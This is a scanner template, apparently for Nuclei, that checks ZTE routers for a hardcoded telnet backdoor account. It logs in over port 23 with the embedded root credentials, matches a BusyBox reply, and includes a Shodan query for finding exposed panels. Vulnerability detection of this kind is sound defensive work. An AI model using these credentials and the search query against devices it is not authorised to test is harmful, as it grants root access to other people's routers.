id: backdoored-zte

info:
  name: ZTE Router Panel - Detect
  author: its0x08
  severity: critical
  description: |
    Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-912
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ZTE Corporation"
  tags: edb,network,zte,telnet,backdoor,router,tcp
tcp:
  - host:
      - "{{Hostname}}"
    port: 23
    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
# digest: 4a0a0047304502203864fc91fa1c20bece4245e8bc207f79364cc34b9662fc45b73b1034ec24b8ee0221008be80d5bf4f16161bb309213b1465386bbb28c007a632c15d3485528e944de2c:922c64590222798bb761d5b6d8e72950